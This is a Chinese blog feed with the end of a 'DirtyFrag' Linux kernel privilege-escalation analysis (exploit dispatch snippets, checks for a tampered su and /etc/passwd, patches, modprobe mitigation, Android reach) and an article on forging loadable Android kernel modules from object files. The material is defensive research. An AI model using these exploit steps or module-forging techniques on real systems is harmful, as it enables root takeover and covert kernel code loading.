add_key("rxrpc",...)把当前轮次的SESSION_KEY交给内核。前面的RxRPC握手让客户端把这个key用于RXKAD安全上下文。随后DATA包的cksum也用同一个key算出来，包才能走到rxkad_verify_packet_1()。最后两次splice()把DATA头和/etc/passwd的PageCache页拼成一个UDP包，recvmsg()推动客户端消费这个包，原地解密随之发生。

对应到内核接收路径：

recvmsg
	rxrpc_recvmsg
		rxrpc_recvmsg_data
			rxrpc_verify_data
				rxkad_verify_packet
					rxkad_verify_packet_1
						skb_to_sgvec映射frag
						skcipher_request_set_crypt使用sg作为src和dst
						crypto_skcipher_decrypt写回PageCache

两条链为什么能通杀

单看任意一条链，都有明显边界。

ESP链的写入能力直接，4字节值和偏移都能控制，所以可以拼出一个192字节root-shellELF。缺点是要能创建user和net命名空间，从而拿到当前命名空间里的CAP_NET_ADMIN。如果发行版策略禁用了非特权user namespace，这条路就断了。

RxRPC链优点是不需要user namespace，add_key()、socket(AF_RXRPC)、socket(AF_ALG)、splice()和recvmsg()都可以由普通用户触发。缺点是写入值要靠fcrypt_decrypt(C,K)碰撞，不能随便写大段payload，并且目标系统要有rxrpc.ko。

DirtyFrag把两者串起来：

if (force_rxrpc) {
	rc = rxrpc_lpe_main(new_argc, co_argv);
for (int i = 0; !passwd_already_patched() && i < 3; i++)
		rc = rxrpc_lpe_main(new_argc, co_argv);
} elseif (force_esp) {
	rc = su_lpe_main(new_argc, co_argv);
} else {
	rc = su_lpe_main(new_argc, co_argv);
if (!su_already_patched()) {
		rc = rxrpc_lpe_main(new_argc, co_argv);
for (int i = 0; !passwd_already_patched() && i < 3; i++)
			rc = rxrpc_lpe_main(new_argc, co_argv);
	}
}

默认流程是先走ESP；如果/usr/bin/su没有被污染，再切到RxRPC，尝试污染/etc/passwd。最后统一走run_root_pty()执行su -并接管交互。

污染判定只看两个稳定位置：

staticintsu_already_patched(void)
{
	pread(fd, got, sizeof(got), 0x78);
returnmemcmp(got, su_marker, sizeof(su_marker)) == 0;
}
staticintpasswd_already_patched(void)
{
	pread(fd, head, sizeof(head), 0);
returnmemcmp(head, "root::0:0", 9) == 0;
}

DirtyFrag所谓通杀，不是一个入口覆盖所有Linux发行版，而是两个页缓存写漏洞分别覆盖彼此盲区。

补丁与缓解

ESP分支的修复思路是给从splice()来的外部共享frag打标记，然后在ESP输入路径里识别它，强制走COW。

-		} else if (!skb_has_frag_list(skb)) {
+		} else if (!skb_has_frag_list(skb) &&
+			   !skb_has_shared_frag(skb)) {
			nfrags = skb_shinfo(skb)->nr_frags;
			nfrags++;

发送路径上增加标记：

+			if (!(flags & MSG_NO_SHARED_FRAGS))
+				skb_shinfo(skb)->flags |= SKBFL_SHARED_FRAG;

这个补丁的思路比单纯在ESP里无脑skb_cow_data()更克制：只要frag来自外部共享页，就不允许它走原地解密快路径。

RxRPC分支的补丁更短。原代码只检查skb_cloned(skb)，但从splice()来的非线性skb不一定是cloned。补丁把skb->data_len也纳入检查，只要有非线性数据，就先复制。

-			    skb_cloned(skb)) {
+			    (skb_cloned(skb) || skb->data_len)) {
				/* Unshare the packet so that it can be
				 * modified by in-place decryption.
				 */

临时缓解可以禁用相关模块：

printf'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \
	> /etc/modprobe.d/dirtyfrag.conf
rmmod esp4 esp6 rxrpc 2>/dev/null

这只是临时措施。生产环境最终还是要跟进发行版内核更新，尤其要确认ESP和RxRPC两个分支是否都已经回补。

总结

DirtyFrag是一个页缓存引用边界被网络协议栈打穿的逻辑漏洞。用户态通过splice()把只读文件页带进skb->frag，内核协议代码又在没有隔离的情况下原地解密，于是“只读文件页”变成了“可被内核写的目的buffer”。

那么，这个洞是否可以作用于安卓实现LPE提权？

以安卓GKI arm64配置为例，虽然XFRM和ESP需要的内核配置：CONFIG_XFRM_USER=y、CONFIG_INET_ESP=y、CONFIG_INET6_ESP=y在GKI内核中都开启了。但问题是ESP链需要能配置XFRM状态，核心权限是CAP_NET_ADMIN。这在安卓上就不行了，普通用户设备可取不了这个权限。还有GKI配置里能看到CONFIG_NAMESPACES=y，但CONFIG_USER_NS和CONFIG_NET_NS在该配置中没有打开，CONFIG_PID_NS也明确关闭；再叠加应用沙箱、SELinux和seccomp，普通App不能按发行版那套方式创建可用的网络命名空间并配置XFRM。

一句话总结就是：就算把用户态代码交叉编译成安卓ELF，普通App进程也很难走到DirtyFrag需要的RxRPC触发面。

参考资料

DirtyFrag仓库：https://github.com/V4bel/dirtyfrag
DirtyFrag官方技术说明：https://github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md
ESP修复提交：https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4
ESP补丁邮件：https://lore.kernel.org/all/afLDKSvAvMwGh7Fy@v4bel/
RxRPC补丁邮件：https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/
CopyFail2仓库：https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
Android GKI arm64配置：https://android.googlesource.com/kernel/common/+/refs/heads/android-mainline/arch/arm64/configs/gki_defconfig
Android seccomp说明：https://android-developers.googleblog.com/2017/07/seccomp-filter-in-android-o.html
Android SELinux说明：https://source.android.com/docs/security/features/selinux

跳转微信打开

安卓GKI内核KPM加载器开发踩坑实战

Thu, 07 May 2026 11:57:00 +0800

原创 shixuan 2026-05-07 11:57 湖北

安卓GKI内核KPM加载器开发踩坑实战

本文详细记录了把.o变成.ko在安卓系统上完整加载的全过程探索，一起来感受ELF格式探索的奇妙之旅
作者：shixuan

经作者授权，文章重排优化后在[软件安全与逆向分析]公众号发布

1 问题起点与ELF边界

有一段用户空间代码需要在内核里跑。正常做法是用内核构建系统进行编译生成ko模块，但那样得维护一套Kbuild，而且代码里的用户空间惯用法改起来很痛苦。于是就冒出一个念头：能不能直接把编译好的二进制文件直接"转"成ko模块？

直觉上这应该可行——反正.ko就是ELF可重定位文件（ET_REL），普通的 .o 编译产物也是 ET_REL。格式骨架一样，差的无非是元数据。

真的上手之后，才发现坑比想象中多得多。

ELF类型和转换边界

先理清几个基本概念。ELF 文件有四种类型：

类型	说明	谁处理重定位
ET_REL (.o, .ko)	可重定位，未链接	链接器 / 内核加载器
ET_DYN (.so)	动态链接库，位置无关	ld.so（用户空间）
ET_EXEC	可执行文件	内核 ELF 加载器
ET_CORE	core dump	—

关键认知：so文件是 ET_DYN，ko文件是ET_REL。它们的ELF类型就不同。

so不能直接转ko的原因

.so文件是 ET_DYN（动态链接库），结构上和.ko有本质差异：

内核直接拒绝

内核加载模块的第一步，就是检查ELF类型——必须是ET_REL，否则直接返回-ENOEXEC。ET_DYN的.so连第一道门都过不去。这个检查在 kernel/module.c的elf_validity_check() 中：

// kernel/module.c: elf_validity_check()
if (memcmp(info->hdr->e_ident, ELFMAG, SELFMAG) != 0
    || info->hdr->e_type != ET_REL         // ← 只接受 ET_REL
    || !elf_check_arch(info->hdr)
    || info->hdr->e_shentsize != sizeof(Elf_Shdr))
return -ENOEXEC;

动态链接段太多

.so里塞满了动态链接基础设施：.dynamic, .dynsym, .dynstr, .hash, .gnu.hash, .got, .got.plt, .plt.got, .rel.dyn, .rel.plt, .interp。

这些段包含了各种不必要的信息，对内核模块加载器毫无意义，必须全部删除。

符号表带了版本后缀

.so 的符号名长这样：

puts@GLIBC_2.2.5
malloc@GLIBC_2.0

内核导出符号可没有这些@后缀。用带后缀的名字去查内核符号表，内核在 simplify_symbols() 里调用 resolve_symbol_wait() 做严格的 strcmp 比对，当然查不到。

PLT/GOT引入的重定位一团乱

.so 里的函数调用默认走 PLT（过程链接表），会生成大量 PLT 相关的重定位条目。内核加载器内部的 apply_relocations() 遍历所有 SHT_RELA 段逐个处理重定位，这些 PLT 重定位条目会被逐一处理，但处理逻辑和用户空间 ld.so 完全不同，结果就是错位。

结论：用 gcc -c -fPIC 编译成 .o（ET_REL），直接从 ET_REL 转 ET_REL。

2 内核模块加载链路

在讲具体坑之前，先沿着内核源码（以 Linux 5.10 为例）把模块加载的完整路径走一遍。后面所有坑的根因都能在这条链路上找到。

加载前校验与架构段处理

第一步：ELF 合法性校验 —— elf_validity_check()

// kernel/module.c
staticintelf_validity_check(struct load_info *info)
{
if (info->len < sizeof(*(info->hdr)))
return -ENOEXEC;
if (memcmp(info->hdr->e_ident, ELFMAG, SELFMAG) != 0
        || info->hdr->e_type != ET_REL          // ① 必须是 ET_REL
        || !elf_check_arch(info->hdr)            // ② 架构必须匹配
        || info->hdr->e_shentsize != sizeof(Elf_Shdr))
return -ENOEXEC;
// ③ 段头表必须在文件范围内
if (info->hdr->e_shoff >= info->len
        || (info->hdr->e_shnum * sizeof(Elf_Shdr) >
            info->len - info->hdr->e_shoff))
return -ENOEXEC;
    info->sechdrs = (void *)info->hdr + info->hdr->e_shoff;
// ... 后续还会校验段名字符串表索引的有效性
}

三项硬性检查：ELF 魔数、ET_REL 类型、架构匹配。任何一个不过就直接 -ENOEXEC。这就是为什么 .so 不行，同时也意味着我们不能修改 ELF header 把 ET_DYN 改成 ET_REL 了事——架构检查 elf_check_arch() 在 ARM64 上还会验证段结构的完整性。

第二步：内核元数据校验 —— check_modinfo()

// kernel/module.c
staticintcheck_modinfo(struct module *mod, struct load_info *info, int flags)
{
constchar *modmagic = get_modinfo(info, "vermagic");  // 从 .modinfo 提取
int err;
if (flags & MODULE_INIT_IGNORE_VERMAGIC)
        modmagic = NULL;
if (!modmagic) {
        err = try_to_force_load(mod, "bad vermagic");  // 没有 vermagic → 污染内核
if (err)
return err;
    } elseif (!same_magic(modmagic, vermagic, info->index.vers)) {
        pr_err("%s: version magic '%s' should be '%s'\n",
               info->name, modmagic, vermagic);         // vermagic 不匹配 → 直接拒载
return -ENOEXEC;
    }
if (!get_modinfo(info, "intree")) {                  // 检查是否为树内模块
if (!test_taint(TAINT_OOT_MODULE))
            pr_warn("%s: loading out-of-tree module taints kernel.\n", mod->name);
        add_taint_module(mod, TAINT_OOT_MODULE, LOCKDEP_STILL_OK);
    }
    check_modinfo_retpoline(mod, info);                  // 检查 retpoline
// ... staging, livepatch 等检查
}

vermagic 的比对逻辑在 same_magic() 中：

// kernel/module.c
staticinlineintsame_magic(constchar *amagic, constchar *bmagic,
bool has_crcs){
if (has_crcs) {
        amagic += strcspn(amagic, " ");
        bmagic += strcspn(bmagic, " ");
    }
returnstrcmp(amagic, bmagic) == 0;    // ← 严格字符串比对
}

如果内核启用了 CONFIG_MODVERSIONS，会跳过 vermagic 里第一个空格之前的内容再做比对（因为那部分是 UTS_RELEASE）。否则就是完整的 strcmp。

第三步：架构特定处理 —— module_frob_arch_sections()

在分配模块内存之前，内核调用架构钩子检查和预处理段结构。ARM64 的实现（arch/arm64/kernel/module-plts.c）尤其值得关注：

// arch/arm64/kernel/module-plts.c
intmodule_frob_arch_sections(Elf_Ehdr *ehdr, Elf_Shdr *sechdrs,
char *secstrings, struct module *mod){
unsignedlong core_plts = 0;
unsignedlong init_plts = 0;
    Elf_Shdr *tramp = NULL;
int i;
for (i = 0; i < ehdr->e_shnum; i++) {
if (!strcmp(secstrings + sechdrs[i].sh_name, ".plt"))
            mod->arch.core.plt_shndx = i;
elseif (!strcmp(secstrings + sechdrs[i].sh_name, ".init.plt"))
            mod->arch.init.plt_shndx = i;
elseif (!strcmp(secstrings + sechdrs[i].sh_name,
".text.ftrace_trampoline"))
            tramp = sechdrs + i;
    }
if (!mod->arch.core.plt_shndx || !mod->arch.init.plt_shndx) {
        pr_err("%s: module PLT section(s) missing\n", mod->name);
return -ENOEXEC;         // ← .plt 和 .init.plt 缺一不可
    }
// ... PLT 条目预分配逻辑
}

ARM64 的模块链接脚本同样印证了这一点（arch/arm64/include/asm/module.lds.h）：

// arch/arm64/include/asm/module.lds.h
SECTIONS {
    .plt 0 : { BYTE(0) }
    .init.plt 0 : { BYTE(0) }
    .text.ftrace_trampoline 0 : { BYTE(0) }
}

内核构建工具链生成的 .ko 天然带这三个段（大小可以为 0，内容为 1 字节占位）。自己构建的 .ko 如果缺少这些段，ARM64 的 module_frob_arch_sections 直接返回 -ENOEXEC。x86_64 没有这个硬性要求。

符号解析、重定位与初始化

第四步：符号解析 —— simplify_symbols()

// kernel/module.c
staticintsimplify_symbols(struct module *mod, conststruct load_info *info)
{
    Elf_Shdr *symsec = &info->sechdrs[info->index.sym];
    Elf_Sym *sym = (void *)symsec->sh_addr;
conststructkernel_symbol *ksym;
for (i = 1; i < symsec->sh_size / sizeof(Elf_Sym); i++) {
constchar *name = info->strtab + sym[i].st_name;
switch (sym[i].st_shndx) {
case SHN_UNDEF:                              // ← 关键：未定义符号
            ksym = resolve_symbol_wait(mod, info, name);
if (ksym && !IS_ERR(ksym)) {
                sym[i].st_value = kernel_symbol_value(ksym);
break;                                // 在内核符号表中找到了
            }
if (!ksym && ELF_ST_BIND(sym[i].st_info) == STB_WEAK)
break;                                // 弱符号，允许不存在
            ret = PTR_ERR(ksym) ?: -ENOENT;
            pr_warn("%s: Unknown symbol %s (err %d)\n",
                    mod->name, name, ret);
break;                                    // 找不到 → 失败
case SHN_ABS:
break;                                    // 绝对符号，不需要重定位
default:
            secbase = info->sechdrs[sym[i].st_shndx].sh_addr;
            sym[i].st_value += secbase;               // 段内符号，加上段基址
break;
        }
    }
return ret;
}

核心逻辑：

shndx == SHN_UNDEF
（值为 0）→ 去内核符号表搜索，找到就把 st_value 填成内核地址
shndx == SHN_ABS
→ 已经是绝对值，不动
其他 → 段内定义的符号，st_value 加上所在段的加载基址

所以 UND 符号的 shndx 必须是 0。如果你在转换时把它改成了 SHN_ABS（0xFFF1），它就不会进入 resolve_symbol_wait 分支，内核不会去查符号表，外部引用全部悬空。

第五步：重定位处理 —— apply_relocations()

// kernel/module.c
staticintapply_relocations(struct module *mod, conststruct load_info *info)
{
int err = 0;
for (i = 1; i < info->hdr->e_shnum; i++) {
unsignedint infosec = info->sechdrs[i].sh_info;  // 目标段索引
if (infosec >= info->hdr->e_shnum)
continue;
if (!(info->sechdrs[infosec].sh_flags & SHF_ALLOC))
continue;                                     // 跳过未分配段
if (info->sechdrs[i].sh_type == SHT_REL)
            err = apply_relocate(info->sechdrs, info->strtab,
                                 info->index.sym, i, mod);
elseif (info->sechdrs[i].sh_type == SHT_RELA)
            err = apply_relocate_add(info->sechdrs, info->strtab,
                                     info->index.sym, i, mod);  // ← 处理 RELA
if (err < 0)
break;
    }
return err;
}

这段逻辑遍历所有段头，找出类型为 SHT_RELA 的段（重定位段），调用架构特定的 apply_relocate_add() 逐条处理。

.rela.gnu.linkonce.this_module 就是在这里被处理的。内核遍历到这个段时，把 init_module 和 cleanup_module 的最终地址写入 .gnu.linkonce.this_module 段内对应偏移处。这些偏移正是 struct module 中 init/exit 函数指针的位置。

第六步：发起初始化 —— do_init_module()

// kernel/module.c
static noinline intdo_init_module(struct module *mod)
{
int ret = 0;
structmod_initfree *freeinit;
    freeinit = kmalloc(sizeof(*freeinit), GFP_KERNEL);
    freeinit->module_init = mod->init_layout.base;
    do_mod_ctors(mod);
if (mod->init != NULL)                     // ← 关键判断
        ret = do_one_initcall(mod->init);       // 通过函数指针调用
if (ret < 0)
goto fail_free_freeinit;
    mod->state = MODULE_STATE_LIVE;
// ... uevent, async 同步, 释放 init 内存
}

内核调用 mod->init 这个函数指针。这个指针的值是在第五步的重定位处理中填入的。如果 .rela.gnu.linkonce.this_module 段不存在或偏移量不正确，mod->init 就是 NULL，内核跳过整个初始化流程，不报任何错误。

同样，模块卸载时（kernel/module.c 的 free_module() 路径）：

// kernel/module.c: 模块卸载路径
if (mod->exit != NULL)
    mod->exit();

mod->exit 也是通过重定位填入的。两个函数指针，两条重定位，缺一不可。

CRC版本校验

第七步：CRC 校验 —— check_version()

如果内核开启了 CONFIG_MODVERSIONS，每个外部符号引用都要比对 CRC：

// kernel/module.c
staticintcheck_version(conststruct load_info *info,
constchar *symname,
struct module *mod,
const s32 *crc){
    Elf_Shdr *sechdrs = info->sechdrs;
unsignedint versindex = info->index.vers;
structmodversion_info *versions;
if (!crc)
return1;                          // 内核没提供 CRC，放行
if (versindex == 0)
return try_to_force_load(mod, symname) == 0;  // 模块没 __versions 段
    versions = (void *)sechdrs[versindex].sh_addr;
    num_versions = sechdrs[versindex].sh_size
        / sizeof(struct modversion_info);
for (i = 0; i < num_versions; i++) {
if (strcmp(versions[i].name, symname) != 0)
continue;
if (versions[i].crc == crcval)
return1;                      // CRC 匹配
goto bad_version;                  // 符号名匹配但 CRC 不匹配 → 失败
    }
    pr_warn_once("%s: no symbol version for %s\n", info->name, symname);
return1;                              // 没找到对应条目，警告但放行
}

模块的 __versions 段存储了 struct modversion_info 数组（64 字节每项：CRC + 符号名）。内核逐个比对 CRC 值，不匹配则加载失败。其中 module_layout 这个符号的 CRC 实质上代表了整个 struct module 的结构签名。

以上就是模块从 insmod 到 init 执行经过的全部内核关卡。接下来看转换过程中的具体坑。

3 离线转换流水线

搞清楚内核加载路径后，我设计了两阶段流水线：

开发机                              目标设备
--------                            ---------
.o 文件                             reference.ko (任意已有模块)
  │                                     │
  ▼                                     ▼
[离线转换] ──► .ko (带占位值) ──► [原位修补] ──► .ko (可加载)

阶段一（离线转换）在开发机上完成 ELF 结构层面的转换：删掉不需要的段、保留需要的段、补充内核元数据段、重新索引符号和重定位。所有不确定的内核参数填入占位值。

阶段二（原位修补）在目标设备上运行。找一个目标设备上已有的、能正常加载的 .ko 作为"参考"，从中提取所有内核特定参数，覆写占位值。

这个设计的核心思想是：转换工具不需要知道目标内核的任何细节。vermagic、struct module 大小、字段偏移、CRC——全部由参考 .ko 提供。

段、符号与重定位

以下按排查难度排序。

坑 1：段的白名单与黑名单

转换的第一步：决定哪些段保留、哪些丢弃。

必须丢弃的段：

所有动态链接相关的（.dynamic, .dynsym, .dynstr, .hash, .gnu.hash 等共十余个段）
GOT/PLT 相关段（.got, .got.plt, .plt.got, .plt.sec）
原始的重定位段（.rel.*, .rela.*）——因为段索引已变，旧的重定位条目引用的段索引失效，必须删除后基于新段表重新生成

必须保留的段：

.text
, .data, .rodata, .bss（基本代码和数据）
.init_array
, .eh_frame 等辅助段
.comment
, .note.* 等信息段

ARM64 上必须额外创建的空段：

从上面 module_frob_arch_sections() 的源码可以看到，ARM64 直接按段名查找 .plt 和 .init.plt，找不到就返回 -ENOEXEC。ARM64 的链接脚本 .lds.h 也明确定义了这三个空段。所以转换阶段必须生成：

.plt
：12 字节，SHT_NOBITS，SHF_EXECINSTR | SHF_ALLOC
.init.plt
：12 字节，SHT_NOBITS，SHF_EXECINSTR | SHF_ALLOC
.text.ftrace_trampoline
：12 字节，SHT_NOBITS，SHF_EXECINSTR | SHF_ALLOC

缺任何一个，内核直接拒载，错误信息只是 "module PLT section(s) missing"，不给具体缺少哪个。

原始重定位段必须删除。删除了部分段、重构了段索引后，旧的重定位条目引用的段索引已失效。如果新旧重定位段并存（比如两套 .rela.text），加载器在处理第二条重定位时发现目标位置已有非零值，会报 "Invalid relocation target, existing value is nonzero"。

坑 2：ET_REL 的地址是段相对的，库给你的可能是绝对的

ET_REL 文件里的地址全部是段相对的：

符号的 st_value = 该符号在其所属段内的偏移
重定位的 r_offset = 在目标段内的偏移位置

比如符号的 value 应该是类似 0x10 的值（"函数入口在 .text 段偏移 0x10 处"），绝对不是 0x7f0000001000 这样的虚拟地址。

对应到内核源码，simplify_symbols() 里的 default 分支：

default:
    secbase = info->sechdrs[sym[i].st_shndx].sh_addr;  // 段的加载基址
    sym[i].st_value += secbase;                          // st_value + 段基址 = 绝对地址

内核假设 st_value 是段相对偏移，然后加上段加载基址得到最终地址。如果你的 st_value 已经是个绝对 VA，再加上段基址就飞到九霄云外了。

但 ELF 解析库在处理 ET_REL 时，某些 API 返回的却是绝对虚拟地址——内部走的是处理 ET_DYN/ET_EXEC 的逻辑分支。

因此需要把所有符号值和重定位偏移都显式减掉所在段的虚拟基地址，不能依赖"ET_REL 的段 VA 都是 0"的假设。

坑 3：重定位类型里藏着架构前缀

ELF 解析库（这里用的是 LIEF）在表示重定位类型时，把架构信息编码进了类型值的高位：

重定位类型	标准值	LIEF 返回
R_X86_64_64	1	0x80000001
R_X86_64_PC32	2	0x80000002
R_AARCH64_ABS64	1	0x101

如果直接把 LIEF 编码的类型值写回 ELF 的 r_info 字段，接收方按标准解码会得到完全不同的数字。用掩码 0x7FFFFFF（低 27 位，对应 ELF 规范中 r_info 的低位布局）剥离架构前缀即可。

坑 4：UND 符号不要碰

内核模块引用的外部符号——_printk, kmalloc, kfree——在原文件里 shndx = 0（SHN_UNDEF）。

回顾上面的 simplify_symbols() 源码：

case SHN_UNDEF:
    ksym = resolve_symbol_wait(mod, info, name);  // 只有 shndx==0 才走这里
if (ksym && !IS_ERR(ksym)) {
        sym[i].st_value = kernel_symbol_value(ksym);
break;
    }

内核根据 shndx == SHN_UNDEF 来判断是否需要在全局符号表里搜索。SHN_UNDEF 的值就是 0。

在转换过程中，段的增删导致段索引需要重新映射。写映射逻辑时，很容易写出：

if (orig_shndx > 0 && orig_shndx < SHN_ABS)
    映射到新段索引
else
    shndx = SHN_ABS  // ← shndx==0 落入了这个分支！

shndx = 0 被改写成了 SHN_ABS（0xFFF1）。内核看到 SHN_ABS，直接走 break 分支，st_value 保持不变——对 UND 符号来说就是 0。外部调用全部悬空，内核不会去符号表里找。

教训：shndx 为 0 时必须原样保持 0。一个 if (orig_shndx == 0) 的提前判断就够。

坑 5：空名字的符号不一定是垃圾

这是最反直觉的一个坑。

写符号过滤逻辑时，很自然会跳过"名字为空、value 为 0、size 为 0"的符号。但有一种叫 STT_SECTION 的符号类型——表示"段本身"。它的名字确实是空的，value 也可以是 0，但它是重定位的重要目标。

什么时候重定位会引用STT_SECTION

.rodata
里的字符串常量 → 重定位需要 .rodata 段的基址
.text
里的异常处理表（eh_frame）→ 重定位需要 .text 段的基址
任何需要段基址作为重定位计算基准的地方

这些重定位通过 shndx 字段关联到 STT_SECTION 符号，再由 STT_SECTION 符号的 shndx 找到目标段，最终由 simplify_symbols() 的 default 分支加上段基址。

如果 STT_SECTION 符号被当成无效条目清理掉了，引用了它的重定位条目就找不到目标，要么指向符号 0（空符号），要么符号索引越界。

教训：符号的生死不能单靠名字和 value 判断。类型为 STT_SECTION 的必须保留，并建立原始段索引到新符号索引的映射表。

坑 6：符号版本后缀

从 .so 文件提取符号时（即使最终不用 .so 做输入，这个坑也值得记），符号名可能带版本后缀：

puts@GLIBC_2.2.5
__cxa_atexit@GLIBC_2.2.5

这是 GNU 符号版本控制机制。内核的 resolve_symbol_wait() 做的是直接 strcmp，@GLIBC_2.2.5 这种后缀当然对不上。在构建输出符号表时，查找 @ 字符并截断就行。

坑 7：vermagic 精确匹配

从 check_modinfo() 和 same_magic() 的源码可以看出，vermagic 做的是严格字符串比对（或跳过第一个空格前缀后的比对）。vermagic 的构成由 include/linux/vermagic.h 的宏拼装决定：

// include/linux/vermagic.h#define VERMAGIC_STRING                         \
    UTS_RELEASE " "                             \
    MODULE_VERMAGIC_SMP MODULE_VERMAGIC_PREEMPT \
    MODULE_VERMAGIC_MODULE_UNLOAD MODULE_VERMAGIC_MODVERSIONS \
    MODULE_ARCH_VERMAGIC                        \
    MODULE_RANDSTRUCT

其中每个宏是否展开取决于对应的 CONFIG 选项：

CONFIG_SMP
→ "SMP "
CONFIG_PREEMPT_BUILD
→ "preempt "
CONFIG_MODULE_UNLOAD
→ "mod_unload "
CONFIG_MODVERSIONS
→ "modversions "
MODULE_ARCH_VERMAGIC
→ ARM64 上是 "aarch64"，x86_64 上是空串

一个典型的 vermagic 长这样：

6.19.11+kali-amd64 SMP preempt mod_unload

注意末尾的 mod_unload 后面可能有一个空格（取决于宏展开时 "mod_unload " 的尾随空格），这个空格也参与比对。

处理vermagic时不能在转换阶段猜测目标内核参数，而要从参考 .ko 的 .modinfo 段中提取完整值，再完整覆写到目标。

坑 8：struct module 的大小和布局不可预测

struct module 是内核在内存里为每个模块维护的数据结构（定义在 include/linux/module.h，几百行的巨型结构体）。它的大小和字段布局完全取决于内核编译配置：

CONFIG_MODULE_UNLOAD
→ 控制 exit 相关字段的存在
CONFIG_SYSFS
→ 插入 sysfs 属性字段
CONFIG_KALLSYMS
→ 增加符号表相关字段
CONFIG_TRACEPOINTS
→ 插入 tracepoint 字段
等等数十个 CONFIG 选项

同一内核版本、不同 defconfig，sizeof(struct module) 可能差几百到上千字节。

如果一个 .ko 的 .gnu.linkonce.this_module 段大小和目标内核不一致，layout_and_allocate() 在分配模块内存时会按内核自己的 sizeof 来布局，大小对不上会导致段覆盖或越界访问。

这里直接从参考 .ko 复制整个 .gnu.linkonce.this_module 段数据。参考 .ko 本就是用这个内核的 Kbuild 编译出来的，它的 struct module 一定正确。

模块名也在这个结构体里。但名字字段的偏移同样是内核版本决定的：

内核版本/架构	名字偏移
x86_64 Linux 6.19	24
ARM64 Linux 5.10 (Android 12)	24

不硬编码偏移。在参考的 struct module 数据里搜索参考模块自己的名字字符串，定位到名字字段，然后在那里写入新的模块名。

坑 9：.modinfo 的字段规范

.modinfo 是一个嵌入在 ELF 段里的 key=value\0 格式字符串表。内核通过 get_modinfo(info, "字段名") 查找其中的键值对，比如前面看到的 get_modinfo(info, "vermagic")。

必须包含的字段（结合 check_modinfo() 源码和内核约定）：

字段	用途	谁使用
`vermagic`	内核版本 + 编译选项签名	`check_modinfo()` 做严格比对
`name`	模块名称	`check_modinfo()` 显示 / modprobe
`license`	许可证（如 GPL）	内核限制 GPL-only 导出符号访问
`intree`	标记为树内模块	`check_modinfo()` 检查，OOT 模块会污染内核
`retpoline`	启用 Retpoline 缓解	`check_modinfo_retpoline()` 检查
`init`	初始化函数名	modprobe、用户空间工具
`cleanup`	清理函数名	modprobe、用户空间工具

特别需要强调：init=init_module 和 cleanup=cleanup_module 只是 modprobe 等工具的约定，内核本身不解析这两个字段来找入口函数。内核唯一找 init/exit 的途径是通过 struct module 里的函数指针（见下一个坑）。

坑 10：init_module 为什么没有被调用 —— 核心坑

这是花了最长时间 debug 的问题。

现象：模块加载成功（insmod 返回 0），卸载也成功，没有错误日志。但 init 函数里的代码就是没执行。把 init 的返回值改成 -1，加载居然还是成功——说明 init 根本没被调用到。

回看 do_init_module() 的源码：

// kernel/module.c
if (mod->init != NULL)
    ret = do_one_initcall(mod->init);
if (ret < 0) {
goto fail_free_freeinit;
}

mod->init 的值是从哪里来的？不是符号表查找，不是 .modinfo 的 init= 字段。是 apply_relocations() 在处理 .rela.gnu.linkonce.this_module 段时填入的。

在处理重定位时，内核遍历所有 SHT_RELA 段，遇到 .rela.gnu.linkonce.this_module，执行类似以下操作：

r_offset 0x138: 将符号 init_module 的绝对地址写入 .gnu.linkonce.this_module + 0x138
r_offset 0x4c0: 将符号 cleanup_module 的绝对地址写入 .gnu.linkonce.this_module + 0x4c0

这两个偏移量（0x138 和 0x4c0）正是 struct module 内部 init/exit 函数指针的偏移位置。

真实 .ko 的 .rela.gnu.linkonce.this_module 段内容示例（x86_64 Linux 6.19）：

Offset        Type             Symbol
0x0138        R_X86_64_64      init_module
0x04c0        R_X86_64_64      cleanup_module

ARM64安卓5.10上的真实数据：

Offset        Type              Symbol
0x0190        R_AARCH64_ABS64   init_module
0x03c0        R_AARCH64_ABS64   cleanup_module

不同架构、不同内核版本的偏移量不同。但原理一样：内核靠重定位把函数指针填进 struct module，不是靠名字查找。

所以必须在转换阶段生成 .rela.gnu.linkonce.this_module 段，包含指向 init_module 和 cleanup_module 的两条重定位。偏移量先用已知值初始化（如 x86_64 用 0x138/0x4c0，ARM64 用 0x190/0x3c0），然后在目标修补阶段从参考 .ko 的同名重定位段中提取实际偏移，不匹配就修正。

如果没有这个段或其偏移量是错的，mod->init 就是 NULL，内核静默跳过 init，不报任何错误。

坑 11：重定位目标段的判定与重新索引

重定位条目的 r_offset 标记了"在目标段偏移处写入修正值"。但重定位条目本身需要被分组归属到不同的目标段。

可靠的做法是分两级查找：

优先用库提供的"重定位所属段" API（如果库支持）
库找不到时，用 r_offset（绝对 VA）去匹配所有保留段的 VA 范围，找到包含它的段

如果两步都找不到目标段——比如重定位指向的是已经删掉的段——就跳过，不写入。

每条重定位的 r_info 字段需要重新计算：高 32 位填入符号在新符号表中的索引（不是原始索引），低 32 位填入剥离架构前缀后的重定位类型。

坑 12：重定位段命名和 ELF 结构

输出的重定位段命名规则：.rela + 目标段名。比如目标段是 .gnu.linkonce.this_module，重定位段就是 .rela.gnu.linkonce.this_module。目标段是 .text，重定位段就是 .rela.text。

每个 SHT_RELA 段的 ELF 段头中：

sh_link
→ 指向 .symtab（符号表段索引）
sh_info
→ 指向目标段（被重定位的那个段）
sh_type
→ SHT_RELA（或 SHT_REL，取决于架构）

apply_relocations() 遍历段时依赖 sh_info 找到目标段、sh_link 找到符号表。这两个索引写错一个，内核要么找不到目标段（跳过）、要么读到错误的符号表（重定位算错）。

坑 13：ARM64 的特殊性总结

ARM64 内核模块有一个 x86_64 没有的硬性段依赖。从 ARM64 的 module_frob_arch_sections() 源码可以直接看到：.plt 和 .init.plt 缺一不可，查找不到直接返回 -ENOEXEC。

另外，在 ARM64 的 module.lds.h 链接脚本中，这三个特殊段在默认链接布局中就必须存在。如果模块不是走内核 Kbuild 编译的（比如我们），必须手搓这三个段。

其他 ARM64 差异：

struct module init/exit 偏移量不同（Android 12 5.10 上 0x190/0x3c0，而非 0x138/0x4c0）
vermagic 包含 aarch64 后缀
重定位类型 LIEF 编码自带 0x100 前缀
Android 内核的 printk 导出名可能是 _printk 而非 printk

转换经验总结

